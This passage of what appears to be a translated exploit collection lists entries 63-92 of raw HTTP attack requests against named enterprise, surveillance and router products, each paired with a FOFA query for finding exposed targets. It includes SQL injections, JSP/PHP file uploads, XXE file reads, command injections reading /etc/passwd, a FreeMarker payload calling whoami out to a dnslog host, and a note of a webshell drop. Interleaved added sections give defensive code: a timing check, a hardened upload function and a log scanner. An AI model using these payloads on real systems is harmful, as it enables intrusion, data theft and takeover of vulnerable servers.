User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request the file the command wrote:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
Affected: IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng management information system (EnjoyRMIS) CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

Time-based: a response that arrives about five seconds later than a normal call confirms the injection.

65. Youkate Lianaiyun (脸爱云) one-face-pass smart management platform 1.0.55.0.0.1 privilege bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456 / 123456 was created without authentication.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators


66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42-43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9 (the MD5 of 102103122), the vulnerability is confirmed.

67. Wanhu ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to, and fileType sets its extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--


The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp.

68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The ;.js suffix after the JSP name is what gets the request past the authentication filter; the injection itself is the five-second WAITFOR DELAY.

69. Wanhu ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


70. Wanhu ezEIP success.aspx command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

The SID header carries the command in base64 (dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk= is "type C:\Windows\win.ini"); the __VIEWSTATE value is the ViewState deserialization payload that reads it.

71. Bangyong PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1


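Entries 64, 68, 69 and 71 above all hinge on WAITFOR DELAY '0:0:5', so confirming any of them is a latency measurement, and a single slow response is not evidence. The script below is an added example, not code from the original post or from any of the listed products: it contrasts the one-shot check that a random slow response fools with a sampled comparison against the slowest benign response. The send callable, the simulated endpoint (which computes latency arithmetically instead of sleeping) and the parameter value are assumptions; against a real host, send would time an HTTP request with the value placed in the injectable parameter.

```python
import random
import re
from typing import Callable, Optional

DELAY_SECONDS = 5.0                         # WAITFOR DELAY '0:0:5' in the POCs above
PAYLOAD = "1';WAITFOR DELAY '0:0:5'--"      # sId value from entry 64 (assumed form)
BENIGN = "1"

Send = Callable[[str], float]               # value in the parameter -> elapsed seconds


def naive_check(send: Send, payload: str, delay: float = DELAY_SECONDS) -> bool:
    """One request, one threshold. Any response slower than the delay is
    reported as injectable, including a one-off GC pause or network stall.
    This is the check to avoid."""
    return send(payload) >= delay


def confirm_time_based(send: Send, benign: str, payload: str,
                       delay: float = DELAY_SECONDS, samples: int = 3) -> bool:
    """Sample the benign value and the payload several times each and require
    every injected response to exceed the *slowest* benign response by most
    of the injected delay. A single spike cannot satisfy all samples."""
    baseline = [send(benign) for _ in range(samples)]
    injected = [send(payload) for _ in range(samples)]
    threshold = max(baseline) + 0.8 * delay   # tolerance for servers that start late
    return all(t >= threshold for t in injected)


WAITFOR_RE = re.compile(r"waitfor\s+delay\s+'(\d+):(\d+):(\d+)'", re.I)


def make_fake_target(vulnerable: bool, spike_on_call: Optional[int] = None,
                     seed: int = 7) -> Send:
    """Constructed stand-in for the SOAP/JSP endpoint: returns the latency a
    request with `value` would take. No network and no sleeping, so it runs
    instantly. `spike_on_call` makes the n-th request slow regardless of input,
    modelling the jitter that fools naive_check."""
    rng = random.Random(seed)
    calls = 0

    def send(value: str) -> float:
        nonlocal calls
        calls += 1
        latency = 0.2 + 0.3 * rng.random()          # 200-500 ms normal latency
        if calls == spike_on_call:
            latency += 6.0                           # one-off slow response
        m = WAITFOR_RE.search(value)
        if vulnerable and m:                         # unparameterised query ran it
            h, mi, s = (int(x) for x in m.groups())
            latency += h * 3600 + mi * 60 + s
        return latency

    return send


if __name__ == "__main__":
    print("vulnerable  :", confirm_time_based(make_fake_target(True), BENIGN, PAYLOAD))
    print("patched     :", confirm_time_based(make_fake_target(False), BENIGN, PAYLOAD))
    print("naive+spike :", naive_check(make_fake_target(False, spike_on_call=1), PAYLOAD))
```

The same sampling applies to the MySQL and PostgreSQL equivalents (SLEEP(), pg_sleep()); only the payload string changes. When scanning many hosts, vary the delay between runs as well, so that a host with a fixed slow path is not mistaken for a vulnerable one.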
72. Seeyon OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%5D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

The xmlValue parameter decodes to the following document; the external entity is expanded into the VALUE field and echoed back:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >
]>
<Signature><Field><a Index="ProtectItem">true</a><b Index="Caption">caption</b><c Index="ID">id</c><d Index="VALUE">&xxe;</d></Field></Signature>

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD


74. Seeyon M3-Server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then fetch the output file:

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x


76. Newcapec campus service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

The UnitCode value is a FreeMarker template; Execute runs the command, which writes a marker file under the ROOT web application. Then fetch it:

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x


77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog/
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--


78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

The target field picks the destination directory; verify with:

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x


79. BYTEVALUE bandwidth-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


80. Superdata (速达) Tianyao software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

The raw request body is written to the path given by the report parameter; the ../ puts it one level up, at the web root:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

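Entries 61, 67, 77, 78 and 80 share one root cause: the handler joins a caller-supplied directory (dir, target, folder, report) with a caller-supplied file name or extension and writes there, so ../ walks into the web root and a .jsp or .aspx gets served. The code below is an added example, not code from any of those products or from the original post: it shows that trusting join beside a hardened version that allowlists extensions, confines the normalised directory to a fixed upload root and chooses the stored name itself. The directory layout and the allowlist are assumptions.

```python
import posixpath
import secrets
from pathlib import PurePosixPath

# Assumed layout: uploads stored inside the deployed web application, which
# is what lets a single ../ in entry 67 reach platform/portal/layout/.
WEBAPP_ROOT = PurePosixPath("/srv/app/webapps/defaultroot")
UPLOAD_ROOT = WEBAPP_ROOT / "upload"
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif", ".pdf", ".txt"}   # assumed allowlist


def normalise(path: PurePosixPath) -> PurePosixPath:
    """Collapse ../ and ./ segments without touching the filesystem."""
    return PurePosixPath(posixpath.normpath(str(path)))


def vulnerable_target(directory: str, filename: str) -> PurePosixPath:
    """What the affected handlers effectively do: join the caller's
    dir/target/folder and file name and write there. Neither traversal
    nor the extension is checked."""
    return UPLOAD_ROOT / directory / filename


def hardened_target(directory: str, filename: str) -> PurePosixPath:
    """Same inputs, three checks: allowlisted extension, directory confined
    to UPLOAD_ROOT after normalisation, server-chosen file name."""
    # 1. extension allowlist, taken from the last suffix of the bare name
    ext = PurePosixPath(PurePosixPath(filename).name).suffix.lower()
    if ext not in ALLOWED_EXT:
        raise ValueError(f"extension not allowed: {ext!r}")
    # 2. the requested directory must still be under UPLOAD_ROOT once ../ is
    #    resolved; an absolute directory replaces the root and is caught too
    target_dir = normalise(UPLOAD_ROOT / directory)
    if target_dir != UPLOAD_ROOT and UPLOAD_ROOT not in target_dir.parents:
        raise ValueError(f"directory escapes upload root: {target_dir}")
    # 3. the client controls neither the path nor the stored name
    return target_dir / f"{secrets.token_hex(16)}{ext}"


def lands_in_webroot(path: PurePosixPath) -> bool:
    """True if the (normalised) path would be served by the web application."""
    return WEBAPP_ROOT in normalise(path).parents


def rejects(directory: str, filename: str) -> bool:
    """True if hardened_target refuses this directory/filename pair."""
    try:
        hardened_target(directory, filename)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    bad = vulnerable_target("../platform/portal/layout/", "apoxkq.jsp")   # entry 67
    print("vulnerable writes:", normalise(bad), "served:", lands_in_webroot(bad))
    print("hardened rejects :", rejects("../platform/portal/layout/", "apoxkq.jsp"))
    print("hardened accepts :", hardened_target("udplog", "report.PDF"))
```

Even the hardened version still stores files under the application; keeping UPLOAD_ROOT outside the servlet container's document root removes the remaining risk of a misconfigured handler executing an allowlisted type.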
81. Uniview video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip


82. Sifudi LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost


83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

The sql field is rendered as a FreeMarker template before it is used, so the same Execute gadget as entry 76 applies; the dnslog callback is the confirmation.

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The EXP request is below; the payload drops a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Shell URL: http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

The newline (%0a) terminates the ping command line and ${IFS} stands in for the space that the filter strips.

87. DBAPPSecurity Mingyu (明御) security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

Then request /jfhatuwe.php; the suffix parameter controls where the uploaded part is written.

88. DBAPPSecurity Mingyu (明御) security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

The type parameter decodes to a shell line that appends a PHP file to the web UI directory:

echo '<?php echo "assdwdmpidmsbzoabahpjhnokiduw"; phpinfo(); ?>' >> /usr/local/webui/txzfsrur.php

Then request /txzfsrur.php (the name written above) and look for the marker string and phpinfo output.

89. Seeyon FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

The %70 in the path is a percent-encoded "p", so the request reaches editflow_manager.jsp while evading a literal ".jsp" filter; a response containing 24642 (111*222) confirms the union injection.

90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig


91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

The ..;/ segment is the Tomcat path-parameter trick: the front filter sees /center/api/task/ while the container resolves the request to /center/orgManage/v1/orgs/download.

92. Hikvision operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

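Most entries in this list leave a recognisable request target in the web server's access log: WAITFOR DELAY (64, 68, 69, 71), the ..;/ Tomcat path-parameter trick (91), the .jsp;.js suffix (68, 69), shell metacharacters or a %0a newline in a parameter (62, 75, 79, 88), ../ traversal (63, 67, 80, 91), FreeMarker <#assign (76, 84) and a base64-encoded sql= parameter (60). The scanner below is an added example for defenders, not part of the original post or of any product's own code: it parses combined-format log lines, URL-decodes the request target, applies those rules and additionally base64-decodes parameter values to catch the entry-60 form. The log lines are constructed, and the rule list is an assumption meant as a starting point rather than a complete signature set; POST bodies (entries 72, 76, 84, 86) never appear in an access log and need a WAF or application log instead.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, unquote_plus

# Apache/nginx combined format: ip ident user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Rules run against the URL-decoded request target (path + query).
RULES = [
    ("sqli-time",               re.compile(r"waitfor\s+delay", re.I)),
    ("sqli-hash",               re.compile(r"hashbytes\s*\(|fn_varbintohexstr|fn_sqlvarbasetostr", re.I)),
    ("tomcat-dotdot-semicolon", re.compile(r"\.\.;/")),
    ("jsp-js-suffix",           re.compile(r"\.jsp;\.js", re.I)),
    ("freemarker-ssti",         re.compile(r"<#assign|\?new\(\)|freemarker\.template\.utility", re.I)),
    ("shell-metachar",          re.compile(r"[?&][^=&]*=(?:\||`|\n)")),   # value starts with | ` or newline
    ("path-traversal",          re.compile(r"[=/]\.\./")),
]
SQL_WORDS = re.compile(r"\b(select|union|insert|update|delete|exec)\b", re.I)


def base64_sql_params(query: str) -> list:
    """Names of query parameters whose base64-decoded value looks like SQL
    (entry 60 sends sql=c2VsZWN0... this way). Non-base64 values are skipped."""
    names = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if len(value) < 8:
                continue
            try:
                decoded = base64.b64decode(value, validate=True).decode("utf-8", "ignore")
            except (binascii.Error, ValueError):
                continue
            if SQL_WORDS.search(decoded):
                names.append(name)
    return names


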